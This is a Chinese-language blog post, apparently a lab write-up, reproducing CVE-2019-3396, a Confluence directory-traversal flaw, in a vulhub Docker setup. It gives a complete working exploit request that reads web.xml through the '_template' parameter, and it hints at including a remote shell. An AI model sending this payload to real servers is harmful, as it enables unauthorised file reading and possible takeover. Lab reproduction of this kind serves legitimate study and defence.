本文主要是介绍CVE-2019-3396:Confluence 文件读取漏洞复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01 漏洞描述
Atlassian Confluence是企业广泛使用的wiki系统,其6.14.2版本前存在一处未授权的目录穿越漏洞,通过该漏洞,攻击者可以读取任意文件,或利用Velocity模板注入执行任意命令。
0x02 漏洞环境
1.根据我过往博客安装vulhub
2.cd 到指定目录:
cd vulhub/confluence/CVE-2019-3396
3.拉取并启动一个Confluence Server 6.10.2:
sudo docker-compose up -d
4. 访问服务器ip地址 如:192.168.109.130:8090进行安装,安装步骤如下:选择Trial Installation——》Next
5.点击Get an evaluation license进行注册,需要向邮箱发送验证
6.在邮箱里操作——》点击New Trial License——》select product——》Confluence
7.然后选择Confluence(server) 填写serverID(就类似我上面那个图上的那个)——》找到license
8.复制到Confluence——》Next (需要等待一段时间,服务器内存最好在4g以上)
9.然后会让你 填写用户名和密码以及邮箱,最后安装成功 点击start即可
0x03 漏洞复现
1.打开burp并刷新页面截包——》send to repeater
2.填写下面的数据包读取web.xml文件
POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 176{"contentId":"786458","macro":{"name":"widget","body":"","params":{"url":"https://www.viddler.com/v/23464dc6","width":"1000","height":"1000","_template":"../web.xml"}}}
3.效果如下:
4.尝试修改 _template 进行任意文件读取:成功(特定版本)
5.也可以通过远程文件包含,包含一个shell,具体看各位大虾操作了。
参考:https://github.com/vulhub/vulhub/tree/master/confluence/CVE-2019-3396
这篇关于CVE-2019-3396:Confluence 文件读取漏洞复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!